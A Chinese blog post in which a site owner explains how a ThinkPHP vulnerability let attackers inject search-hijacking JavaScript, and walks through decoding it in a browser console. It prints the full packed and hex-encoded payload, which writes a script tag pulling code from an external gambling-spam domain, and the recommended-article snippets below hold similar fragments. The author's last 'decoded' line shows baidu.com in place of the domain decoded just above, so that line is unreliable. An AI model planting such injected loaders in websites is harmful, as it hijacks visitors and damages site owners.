网页文件被加入恶意百度跳转代码\x64\x6f\x63\x75\x6d\x65\x6e\x74 【解密】

最新推荐文章于 2024-02-24 16:46:42 发布
最新推荐文章于 2024-02-24 16:46:42 发布
阅读量1.1w 收藏 3
点赞数 2
分类专栏: 靖熙博客 文章标签: 解码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A1452585268/article/details/86481116
版权

前几天,用了tp的框架,后来tp被爆出了漏洞,导致网站被植入了时式彩代码。通过百度搜索进入的用户,直接跳转到这个网站里。今天教给大家怎么解密这种采用eval加密的js代码。

恶意代码源码是这样的:

<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="关键词1,关键词

2,关键词3-"}</script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt

(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e

(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])

p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\e\\c\\1\\l\\i\\8\\n\\0"]["\\7\\4\\9\

\0\\8"](\'\\g\\2\\1\\4\\9\\3\\0 \\0\\k\\3\\8\\d\\6\\0\\8\\r\\0\\5\\f\\a\\s\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\

\1\\d\\6\\o\\0\\0\\3\\2\\p\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\j\\b\\1\\c\\i\\5\\q\\j\\b\\f\\2\\6\\h\\g\\5\

\2\\1\\4\\9\\3\\0\\h\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3c|x3e|

x6d|x38|x79|x75|window|x6e|x68|x3a|x6b|x78|x76'.split('|'),0,{}))
  </script>

打开谷歌或者火狐浏览器,然后按 F12,打开console一栏,接着把这代码复制进去,
最后,去掉开头 4 个字母 eval 然后回车运行下就得到源码了。
恶意代码解码

此时,得到了这个代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x63\x70\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x6b\x38\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');

这是一段通过16进制编码的script病毒,然后我们还需要继续解码:

可以通过alert来解密,例如把上面第一段的粗体字代码解密:

<script language="javascript">alert("\x64\x6f\x63\x75\x6d\x65\x6e\x74");</script>

将此复制到文本文档,更改后缀保存为html格式,然后用浏览器运行就可以得出。
在这里插入图片描述

再复制后面的未解密代码到html里面,依次解密,解密后的代码为:

<script type="text/javascript">eval"window["document"]["write"]('<script type="text/javascript" src="https://www.baidu.com"></script>');"</script>

或者进入此网址:https://www.mokuge.com/tool/js_x16/

输入\x77\x72\x69\x74\x65,这种16进制代码进行转义就行。

Bathewind
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
windows-x64-redis-3.2.1
04-16
windows下 最新版本的Redis 简单使用教程: 在cmd 窗口 使用cd命令切换目录到 你的Redis的安装目录 运行 redis-server.exe redis.windows.conf 就可以了
网站被黑的假象–ARP欺骗之页面中加入一段js
01-19
[removed][removed] 于是只能从这段代码入手,我下载这个js开发发现是下面一段代码代码如下:window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x77\x72\x69\x74\x65\x6c\x6e”](“\x3c\x44\x49\x56 \x73\x74\x...
网站被篡改 收录一些非本网站快照跳转如何解决
网站安全专家
12-15 962
在某些被黑的网站里,我们SINE安全还发现了其他恶意代码,这些代码会操控网站页面内除了 title 以外的其他内容进行任意的切换。HACK经常去攻击一些国内网站,利用这些网站在百度的一些收录和流量去推广做一些世界杯竞猜类的网站和APP,SINE安全技术人员发现这种攻击会对网站自身的排名和百度权重造成很大的影响,通过我们SINESAFE的数据统计,被HACK入侵篡改的网站数量已经超过6万多个,尤其自世界杯开赛以来,被攻击的网站大部分都被劫持跳转到卡塔尔世界杯买球下注的非法网站上。世界杯正规买球app有哪些?
解密x64x6fx63x75x6dx65x6ex74木马的全过程
黑鹰
12-17 2804
<br />一、因为最近工作很忙,没有去看服务器,今天一个朋友跟我说ip8000.com、sql8.net中毒了,状况如下,<br /><br /><br /><br />是一个QQ诈骗广告,于是我想应该是被挂马了上,用基本方法在源码里面搜索了一下没有, 我想不是我IIS中毒了?于是又打开了nz.gdm.cn一样中毒,不过我再打开我服务器其它网站却没有中毒那么就否定了服务器IIS中毒的可能,因为IIS中毒你服务器上都网站状况一样,那么确定是被挂马了。<br /><br /><br />那么木马又放在那里,木
html广告恶意植入,最代码网站的链接被垃圾广告链接恶意提交到百度收录后的经验和代码片段分享...
weixin_36169520的博客
07-02 358
package com.zhanzhang.tools;import java.io.BufferedReader;import java.io.File;import java.io.FileOutputStream;import java.io.IOException;import java.io.InputStream;import java.io.InputStreamReader;imp...
[渗透]网站劫持分析与验证方法总结
胖胖的ALEX
03-10 2323
网站劫持 网站劫持是指当用户打开一个网址的时候,出现一个不归属于网站范畴内的一个广告页面,或者是直接就跳转到某一个不是这个网站所属的页面。 网站劫持分为以下几大类: 一、搜索引擎劫持 搜索引擎劫持简称搜索劫持,其实就是从搜索引擎来的流量自动跳转到指定的网页。可以通过未经用户授权,自动修改第三方搜索引擎结果的软件实现,通常这类程序会在第三方搜索引擎的结果中添加自己的广告或加入网站链接获取流量等。 搜...
从入侵到变现——“黑洞”下的黑帽SEO分析
测试0901-1
04-16 569
概述 由于互联网入口流量主要被搜索引擎占据,网站在搜索引擎中的排名直接影响到市场营销效果,因此SEO服务应运而生。SEO(Search Engine Optimization)全称为搜索引擎优化,是指利用搜索引擎的规则提高网站在相关搜索引擎内的自然排名。SEO服务分为两种:一种是合法的技术手段,通过站内优化、站外优化、内容建设等合理手段提升网站排名;第二...
php x24 x65 x6d x61,js如\x6C\x69\x6E\x65\x63\x68加密代码解压方法
weixin_33752006的博客
03-23 2481
解码方法如下:简单 复制下面的代码 保存为*.htmlvar a1="\x3c\x61\x20\x68\x72\x65\x66\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x73\x6f\x75\x68\x6f\x2e\x6e\x65\x74\x20\x74\x61\x72\x67\x65\x74\x3d\x5f\x62\x6c\x61\x6e\...
纯js加密简单分析
weixin_44234050的博客
04-22 1931
['sojson.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]( ((['sojson.v4'] + [])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null, "108w111.
一段超强的javascript代码解密方法
01-19
代码如下:function Get(){ var $qL1 = new window[“\x44\x61\x74\x65”]() $qL1[“\x73\x65\x74\x54\x...(window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x63\x6f\x6f\x6b\x69\x65”]) var JHasS3 = “\x
x63代码月就是第三部分代码
12-24
x63代码月就是第三部分代码
x86/x64体系结构探索及编程.part2
10-28
本书对Intel手册所述处理器架构的探索和论证。全书共五大部分,从多个方面对处理器架构相关的知识进行了梳理介绍。书中每个章节都有相应的测试实验,所运行的实验例子都可以在真实的机器上执行。...
linux 目录递归遍历,linux下递归遍历目录下的文件,实现批量替换
weixin_35054319的博客
04-28 293
今天刚吃饭的时候,被报告服务的代码全被挂马,经查证好多js的最后被被加入了如下window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x63\x6f\x75\x6e...
navigator.userAgent.toLowerCase() 判断当前用户所使用的浏览器
qq_43059898的博客
06-02 356
判断当前用户所使用的浏览器
JS防止网站被人家镜像
cai58201827的专栏
05-26 688
<script type="text/javascript"> if (window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x6f\x73\x74"] != 'www.xxx.com' && window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x6f\x73\x74"] != 'xxx.com') { alert("警告!检测到该网站为恶意镜像站点,将立即为您跳转到...
Web安全-浅析网页暗链与挂马攻击
热门推荐
道阻且长,行则将至。
02-28 1万+
文章目录前言暗链现状暗链隐蔽性暗链产业链暗链的危害暗链的防御暗链实例暗链技术HTML隐藏型JS引入型暗链暗链检测思路 前言 近年来,随着国家相关部门对互联网安全事件的重视、部分软件开发厂商安全意识的提高,曾经红极一时的“挂马”攻击手段已经日趋减少,特别是 2009 年刑法明确“挂马”事件量刑标准之后,多个曾经猖狂一时的 ”挂马” 集团相继落网,“挂马”这种风险高且收益不稳定的攻击手段逐步为黑色产业链所抛弃。黑色产业链是否因为挂马的衰落而就此沉寂呢?答案是否定的,攻击手段日新月异,其中“暗链”是近年来较为严重
那些笔记
橙-极纪元-cplvfx-JJY.Cheng
06-13 290
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="<%=webset.WebName %>"}</script> <title>&#24517;&#23041;_&#24517;&#23041;&#30005;&#31454;_&#24517;&#2304...
Java script 检测手机端,检测UA, js unicode转码 附赠网站
最新发布
2301_79996063的博客
02-24 452
如果是手机端则跳转百度 如果不是手机端则不跳转。Unicode 转码地址。116 转码之后是t。
\x09\x76\x61\x72\x20\x70\x6c\x63\x3d\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64\x28\x22\x70\x6c\x63\x22\x29\x2c\x6f\x4c\x69\x6e\x6b\x3d\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64\x28\x22\x6c\x69\x6e\x6b\x22\x29\x2c\x70\x72\x6f\x67\x72\x65\x73\x73\x3d\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64\x28\x22\x70\x72\x6f\x67\x72\x65\x73\x73\x22\x29\x3b\x0d\x0a\x09\x77\x69\x6e\x64\x6f\x77\x2e\x74\x6f\x74\x61\x6c\x3d\x31\x3b\x0d\x0a\x09\x0d\x0a\x09\x0d\x0a\x09\x69\x6e\x69\x74\x28\x70\x6c\x63\x2c\x31\x2c\x31\x2c\x22\x58\x6d\x55\x44\x4d\x31\x4e\x6f\x57\x7a\x30\x4a\x4a\x67\x34\x6f\x41\x6d\x52\x66\x59\x6c\x45\x21\x21\x21\x21\x21\x21\x41\x43\x68\x55\x63\x56\x51\x77\x58\x44\x49\x48\x61\x51\x39\x71\x42\x47\x4e\x61\x4d\x67\x5a\x6c\x43\x47\x78\x58\x5a\x77\x74\x69\x22\x2c\x22\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x22\x2c\x22\x73\x67\x5f\x74\x73\x6c\x62\x22\x2c\x22\x73\x6f\x67\x6f\x75\x22\x29\x3b
07-25
引用\[1\]:在解码这个字符串时,我们可以将其粘贴到console中或者在Python中使用print语句打印出来,就可以看到正确的字符。\[1\] 引用\[2\]:在Python中,运行时会默认使用UTF-8解码,对于"\x65"解码后得到的是字符"e"。在这个字符串中,"\x"表示这是一个十六进制表示的字符,而"\x"本身只是表示字符"\"和字符"x",并没有其他的特殊意义,所以不会被解码。\[2\] 引用\[3\]:对于这个字符串,它是某个网站加密后的JS代码。如果你手动复制下来,它仍然是这个样子的。但是如果你使用requests库下载页面后,它就不会是这个样子了。这是因为下载后的内容已经被解码了。如果你想提取其中的一个变量,使用正则表达式匹配后得到的结果会将"\x63"变成"\x63",这样就无法得到真正的字符了。处理这个问题的方法是将"\\"变成"\",可以使用replace("\\","")来实现。\[3\] 问题: 如何将\x转换为实际的字符? 回答: 要将\x转换为实际的字符,可以使用Python中的字符串处理方法。可以使用replace("\\","")来将"\\"替换为"\",这样就可以得到真正的字符了。例如,对于你提供的字符串,可以使用replace("\\x","")来将"\x"替换为空字符串,从而得到实际的字符。 #### 引用[.reference_title] - *1* *2* *3* [\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74解码](https://blog.csdn.net/qq_42636010/article/details/100396688)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值